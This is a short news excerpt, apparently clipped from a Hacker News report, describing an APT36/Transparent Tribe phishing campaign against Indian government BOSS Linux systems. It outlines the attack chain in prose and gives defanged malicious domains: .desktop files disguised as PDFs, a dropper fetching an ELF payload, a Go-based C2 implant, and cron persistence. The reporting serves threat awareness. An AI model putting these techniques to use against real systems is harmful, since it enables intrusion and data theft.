""Initial access is achieved through spear-phishing emails," CYFIRMA said. "Linux BOSS environments are targeted via weaponized .desktop shortcut files that, once opened, download and execute malicious payloads." Transparent Tribe, also called APT36, is assessed to be of Pakistani origin, with the group - along with its sub-cluster SideCopy - having a storied history of breaking into Indian government institutions with a variety of remote access trojans (RATs)."
"The attack chains begin with phishing emails bearing supposed meeting notices, which, in reality, are nothing but booby-trapped Linux desktop shortcut files ("Meeting_Ltr_ID1543ops.pdf.desktop"). These files masquerade as PDF documents to trick recipients into opening them, leading to the execution of a shell script. The shell script serves as a dropper to fetch a hex-encoded file from an attacker-controlled server ("securestore[.]cv") and save it to disk as an ELF binary, while simultaneously opening a decoy PDF hosted on Google Drive by launching Mozilla Firefox."
Initial access is achieved through spear-phishing emails containing booby-trapped .desktop shortcut files disguised as PDFs. Opening the .desktop file executes a shell script that downloads a hex-encoded payload from securestore[.]cv, saves it as an ELF binary, and opens a decoy PDF via Mozilla Firefox. A Go-based binary contacts a hard-coded C2 at modgovindia[.]space:4000 to receive commands, fetch payloads, and exfiltrate data. Persistence is achieved through a cron job that relaunches the payload after reboot or termination. Targets include Indian government entities on Windows and BOSS Linux, and the actor is linked to APT36/Transparent Tribe.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]